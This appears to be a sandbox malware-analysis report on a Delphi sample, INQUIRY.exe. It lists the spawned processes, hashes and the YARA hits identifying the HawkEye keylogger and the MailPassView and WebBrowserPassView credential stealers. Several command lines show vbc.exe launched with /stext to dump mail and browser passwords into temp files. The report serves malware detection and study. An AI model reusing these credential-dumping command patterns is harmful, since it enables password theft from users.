                                                                      Analysis Process: INQUIRY.exe PID: 6792 Parent PID: 6076

                                                                      General

                                                                      Start time:15:02:35
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Analysis Process: dw20.exe PID: 6936 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:39
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2272
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: vbc.exe PID: 5684 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:42
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Analysis Process: vbc.exe PID: 4184 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:43
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Analysis Process: WerFault.exe PID: 1076 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:45
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Analysis Process: INQUIRY.exe PID: 6400 Parent PID: 6792

                                                                      General

                                                                      Start time:15:03:14
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: INQUIRY.exe PID: 240 Parent PID: 6400

                                                                      General

                                                                      Start time:15:03:14
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: INQUIRY.exe PID: 6428 Parent PID: 6400

                                                                      General

                                                                      Start time:15:03:16
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Analysis Process: dw20.exe PID: 204 Parent PID: 240

                                                                      General

                                                                      Start time:15:03:22
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2100
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: INQUIRY.exe PID: 6900 Parent PID: 6428

                                                                      General

                                                                      Start time:15:03:29
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: INQUIRY.exe PID: 1364 Parent PID: 6900

                                                                      General

                                                                      Start time:15:03:30
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: INQUIRY.exe PID: 4424 Parent PID: 6900

                                                                      General

                                                                      Start time:15:03:31
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Analysis Process: dw20.exe PID: 6380 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:34
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2284
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Analysis Process: vbc.exe PID: 5396 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000024.00000002.888584585.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Analysis Process: vbc.exe PID: 3064 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.894159498.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Analysis Process: WerFault.exe PID: 7076 Parent PID: 1364

                                                                      General

                                                                      Start time:15:03:40
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >